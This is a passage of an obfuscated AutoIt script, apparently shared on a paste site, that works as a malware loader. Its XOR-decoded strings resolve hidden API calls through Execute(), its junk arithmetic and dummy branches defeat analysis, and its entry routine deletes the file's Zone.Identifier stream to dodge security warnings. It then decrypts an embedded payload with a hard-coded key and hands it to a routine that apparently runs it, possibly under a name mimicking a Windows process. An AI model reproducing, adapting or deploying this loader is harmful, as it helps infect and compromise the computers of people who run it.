  6221. $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C363630353230333232353334323D37373736363142303237423746363637463436363236323242324237463636374634363630373336333D33343330313632313237423132353337323130373232423143303231333C33303636363746343636323C3235323142303237423136363637463436303132413242333132423530373336333D33343330303D323143303231333632314235323740303235333032353136463637363636313046374634363632303333323243363230363636374634363637343636363D3"), tznhxlbucosri("x0B6A76594"))))
  6222. $1972768996 = 1025992990
  6223. EndIf
  6224. If 153 = 153 AND 294 <= 300 AND 165 > 162 AND $1972768996 = 2132281550 Then
  6225. $ttempstruct = $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463345333734373237353633373434333732363536313734363532383232363237393734363535324232323032363230323436393530363346313639363545343635373837343533363937314635323032324230323233313232323032363230323235344232323342303434363346334533373437323735363337343437363537343530373437323238323437343432373536363636323932393"), "0x")))
  6226. Dim $oydtygfodcdokzq1naoi = tznhxlbucosri("6o8pe4V3DxHUTWF2C")
  6227. $1972768996 = 2144394568
  6228. EndIf
  6229. If 139 <= 232 AND 230 <> 179 AND 267 > 264 AND 114 > 102 AND 167 <> 232 AND $1972768996 = 2134070852 Then
  6230. $e($b(wmhsrosshiij(tznhxlbucosri("x0139753537324732443236353633363437323635343237343635353537303635373033393335363535383734463136343635333243313230333243313335373335333738373447303633363833383"), tznhxlbucosri("x0968494"))))
  6231. $1972768996 = 1141152127
  6232. Dim $hiwy1z1ov4bmco8sqzrx = 1397189 * 2156850 - 118818 + 3899843 + 3710946 * 478726 + 2963715 * 1100193
  6233. EndIf
  6234. If 101 < 151 AND 225 < 293 AND 217 >= 101 AND $1972768996 = 2141934138 Then
  6235. $tbuff = $e($b(wmhsrosshiij(tznhxlbucosri("x043C703032374237413733303336333132373330303733363231323533303231363C36363236333D33303231313646363634363236343036323D323142353336333D303742313231463C363033323030323533303235363D363436364634363637353734373437343636363436323634363631304636363D3"), tznhxlbucosri("x0A6464614"))))
  6236. $1972768996 = 937438825
  6237. Int(69909)
  6238. EndIf
  6239. If 246 = 246 AND 286 >= 105 AND 199 > 147 AND 279 <= 298 AND $1972768996 = 2144394568 Then
  6240. $vreturn = $e($b(wmhsrosshiij(tznhxlbucosri("x0139753337383734473036333638353547383735333935353732473244323635363336343732363535363734363535353730363537303339333536353435373437354631343236353633363437323635333243313534363937343732363436353734333933333230333333383338333243313333323033333332433133353738343137324730373837344435373436393635343237383630473433383"), tznhxlbucosri("x0058437"))))
  6241. WinExists(tznhxlbucosri("1KHau7NVKvWSBKsVXaC8xQ6N56wxdeg82hpxm4Tki8T47O1t"))
  6242. $1972768996 = 1488986972
  6243. IsBool(tznhxlbucosri("nmLe7cIxMsOKeSyEMYDpCHr4L9gFvgGmkQckJ0VhIJgLrdXKIVi37uUjXsAMrA7BezH9C3nHDE83X1RnTaGvC"))
  6244. EndIf
  6245. Next
  6246. EndFunc
  6247.  
  6248. Func mbhtyjglucwb()
  6249. Return Execute(wmhsrosshiij(tznhxlbucosri("x034865704F454"), tznhxlbucosri("x0346724")))
  6250. EndFunc
  6251.  
  6252. Func jurxtjumygfe()
  6253. Return Execute(wmhsrosshiij(tznhxlbucosri("x0249647F425"), tznhxlbucosri("x085")))
  6254. EndFunc
  6255.  
  6256. Func unzxooavpxke()
  6257. Return Execute(wmhsrosshiij(tznhxlbucosri("x064D607C5B465"), tznhxlbucosri("x086746644")))
  6258. EndFunc
  6259.  
  6260. Func suctvkesnwcf()
  6261. Return Execute(wmhsrosshiij(tznhxlbucosri("x0449627342756164756"), "0x"))
  6262. EndFunc
  6263.  
  6264. Func yktvnhwvfiet()
  6265. Return Execute(wmhsrosshiij(tznhxlbucosri("x044C6C63416C6C6"), "0x"))
  6266. EndFunc
  6267.  
  6268. Func musojcquljvk()
  6269. Return Execute(wmhsrosshiij(tznhxlbucosri("x004868675076717760734160704560756"), tznhxlbucosri("x05636F416")))
  6270. EndFunc
  6271.  
  6272. Func jjniinmmjjit()
  6273. Return Execute(wmhsrosshiij(tznhxlbucosri("x06496C65634C6F63756"), tznhxlbucosri("x096")))
  6274. EndFunc
  6275.  
  6276. Func lkvzlzriwsfa()
  6277. Return Execute(wmhsrosshiij(tznhxlbucosri("x054A6F6667466F6667766"), tznhxlbucosri("x056A6")))
  6278. EndFunc
  6279.  
  6280. Func vwjiwvotucxx()
  6281. Return Execute(wmhsrosshiij(tznhxlbucosri("x06496C656F40756E6"), tznhxlbucosri("x026")))
  6282. EndFunc
  6283.  
  6284. Func yiecoikztbeo()
  6285. Return Execute(wmhsrosshiij(tznhxlbucosri("x06496C65625561646"), tznhxlbucosri("x087")))
  6286. EndFunc
  6287.  
  6288. Func hqpzptrjiykn()
  6289. Return Execute(wmhsrosshiij(tznhxlbucosri("x024D6861675160754070767D666"), tznhxlbucosri("x09596A5B6")))
  6290. EndFunc
  6291.  
  6292. Func ouupgcajbsvy()
  6293. Return Execute(wmhsrosshiij(tznhxlbucosri("x07486D6466537865746"), tznhxlbucosri("x04616A7")))
  6294. EndFunc
  6295.  
  6296. Func gstmjrdvwikv()
  6297. Return Execute(wmhsrosshiij(tznhxlbucosri("x084F64657644657"), tznhxlbucosri("x08616B6")))
  6298. EndFunc
  6299.  
  6300. Func nffmfbhqkcjn()
  6301. Return Execute(wmhsrosshiij(tznhxlbucosri("x084270456C686F6"), tznhxlbucosri("x0E4A4E4")))
  6302. EndFunc
  6303.  
  6304. Func sauzmlbzymze()
  6305. Return Execute(wmhsrosshiij(tznhxlbucosri("x0D4377624F687"), "0x"))
  6306. EndFunc
  6307.  
  6308. Func abkqfjgyfwue()
  6309. Return Execute(wmhsrosshiij(tznhxlbucosri("x00527F63656373734C6F63756"), tznhxlbucosri("x025")))
  6310. EndFunc
  6311.  
  6312. Func kgjgedqcelyl()
  6313. Return Execute(wmhsrosshiij(tznhxlbucosri("x01537E626462727449786275727"), tznhxlbucosri("x05757B6")))
  6314. EndFunc
  6315.  
  6316. Func pkvibyvecngy()
  6317. Return Execute(wmhsrosshiij(tznhxlbucosri("x02516E646F6D6"), "0x"))
  6318. EndFunc
  6319.  
  6320. Func pzrowjazssrt()
  6321. Return Execute(wmhsrosshiij(tznhxlbucosri("x02556767527964756"), "0x"))
  6322. EndFunc
  6323.  
  6324. Func gxhelshxletb()
  6325. Return Execute(wmhsrosshiij(tznhxlbucosri("x06517A6"), tznhxlbucosri("x016E43507")))
  6326. EndFunc
  6327.  
  6328. Func rufpklltkliy()
  6329. Return Execute(wmhsrosshiij(tznhxlbucosri("x075C616868614C71676170716"), tznhxlbucosri("x097A5A7A4")))
  6330. EndFunc
  6331.  
  6332. Func mpaxqhxfdinr()
  6333. Return Execute(wmhsrosshiij(tznhxlbucosri("x07586161647"), tznhxlbucosri("x074359675")))
  6334. EndFunc
  6335.  
  6336. Func tewosqlsvwdv()
  6337. Return Execute(wmhsrosshiij(tznhxlbucosri("x0750767D6A636D4A6750767"), tznhxlbucosri("x0649476A7")))
  6338. EndFunc
  6339.  
  6340. Func hhjohdkcyiel()
  6341. Return Execute(wmhsrosshiij(tznhxlbucosri("x0750767D6A63665164786567616"), tznhxlbucosri("x017266777")))
  6342. EndFunc
  6343.  
  6344. Func wnhwoxjwqdgl()
  6345. Return Execute(wmhsrosshiij(tznhxlbucosri("x07596E6548796374737"), "0x"))
  6346. EndFunc
  6347.  
  6348. Func wmhsrosshiij($buuuomngprzt, $mejcxwedlftw)
  6349. Global $1312944448 = 1307843693
  6350. Global $aatc7rushn = 2886295
  6351. For $e = 0 To 2759950
  6352. Dim $3sbom0dl2ei5zs65ev2q = tznhxlbucosri("TCpFjX1KgmyoZ6FdAXOvHZCnrbwLjlguGbIzyFR0uByQGt2Dy34RKG5ScEFnoGcO")
  6353. If 189 <> 174 AND 112 < 227 AND 157 < 232 AND 122 <> 194 AND 112 <= 229 AND $1312944448 = 304222797 Then
  6354. Local $char
  6355. String(tznhxlbucosri("aDKxmN2EiZXEDUCWIAYAdEkCktOnMMjlCdyytsy2cn3QSTVW3"))
  6356. $1312944448 = 1591982618
  6357. IsBool(2415594 - 2119363 + 1080414 - 3924370)
  6358. Mod(3849062, 1359741)
  6359. EndIf
  6360. If 155 >= 148 AND 165 > 121 AND 158 <= 256 AND 168 > 146 AND $1312944448 = 960345959 Then
  6361. Local $split = StringSplit(BinaryToString($buuuomngprzt), "")
  6362. Dim $xjgrckbxjbkxcwdrlnch = 3897265
  6363. $1312944448 = 1681609778
  6364. Dim $xzxyd5x8eqfzo24acc6v = tznhxlbucosri("Fgldv4qggTdEsdmL4NeO2MqWcMtTfB55xu3qLuJIRqJVvaIlYriYQrocXT2HXMNZIkOTScb2fv5Xmgrp")
  6365. Dim $mqwnnuckgeq7d2hzamfg = tznhxlbucosri("W6mXh3GhqGCalUxwe59tuHO7ti9cZXuNDLDRB9nVN4Y9DQQTbUIEHmLaiZIdieSTQL0")
  6366. EndIf
  6367. If 174 = 174 AND 272 < 282 AND 153 >= 142 AND 211 < 288 AND $1312944448 = 1307843693 Then
  6368. Local $result
  6369. $1312944448 = 304222797
  6370. IsString(tznhxlbucosri("4fjuN9wKWot"))
  6371. EndIf
  6372. If 223 >= 171 AND 110 <= 244 AND 203 = 203 AND 111 < 206 AND 281 <> 256 AND $1312944448 = 1591982618 Then
  6373. Local $xor
  6374. $1312944448 = 960345959
  6375. Dim $v4rl9mbk1lbpgcgqojz8 = 2833626 * 3861030 - 2077036
  6376. EndIf
  6377. If 179 > 173 AND 157 <= 187 AND 115 > 111 AND 112 > 101 AND 279 = 279 AND $1312944448 = 1681609778 Then
  6378. Local $len = StringLen(BinaryToString($mejcxwedlftw))
  6379. Ptr(tznhxlbucosri("fI7g9t7ca9lijwZrLcYvQ9n81A"))
  6380. ExitLoop
  6381. IsFloat(tznhxlbucosri("VNdNi6iinhkS0yGFfYFQBjnKh2F3cCrijGADgTQvC3JoFrwIt5Xi69mSzkYkMpeQAepMfwRY9UQLanv6GHiKu4KrrAspG5pAjX0Et3a"))
  6382. EndIf
  6383. Chr(243954)
  6384. Next
  6385. For $i = "1" To $split["0"]
  6386. Global $1591982618 = 1307843693
  6387. Global $tb8jdyqsbg = 3976614
  6388. For $e = 0 To 642517
  6389. Dim $yezfvmhw3defcogwmdrr = tznhxlbucosri("szYfqhoTapSVF095O9A1i7O4uylc3pBQ0")
  6390. If 167 = 167 AND 130 < 201 AND 142 > 131 AND 226 >= 121 AND $1591982618 = 304222797 Then
  6391. $xor = BitXOR($char, $len)
  6392. IsPtr(2795929 * 3336376 + 2512070)
  6393. ExitLoop
  6394. EndIf
  6395. If 231 <= 263 AND 272 > 107 AND 132 < 240 AND 153 <> 271 AND $1591982618 = 1307843693 Then
  6396. $char = Asc($split[$i])
  6397. $1591982618 = 304222797
  6398. IsPtr(3236955 * 1257376 + 1578005)
  6399. EndIf
  6400. IsString(1435037 + 3425477)
  6401. Next
  6402. For $ii = "0" To $len - "1"
  6403. $xor = BitXOR($xor, $len + $ii)
  6404. Next
  6405. $result &= ChrW($xor)
  6406. Next
  6407. Return $result
  6408. EndFunc
  6409.  
  6410. Dim $tpikgrflcy
  6411. edjffcrxok()
  6412.  
  6413. Func edjffcrxok()
  6414. dtagcgaows("SystemSettingsBroker")
  6415. Execute("FileDelete(@ScriptFullPath & ':Zone.Identifier')")
  6416. Global $startupdir
  6417. Dim $wmqlkdkbyl = Execute("DllStructGetData")
  6418. $tpikgrflcy = $wmqlkdkbyl(fpiwnlwmmu("azroleuiy", "5"), 1)
  6419. $tpikgrflcy = bxrpokoote($tpikgrflcy, "SHxmyCDoNTQbZWshHkCmpPMzrhCYbePl")
  6420. EndFunc
  6421.  
  6422. qvymrxbzoa()
  6423.  
  6424. Func qvymrxbzoa()
  6425. kjvzijodxe(@ScriptFullPath, $tpikgrflcy, False, True)
  6426. EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement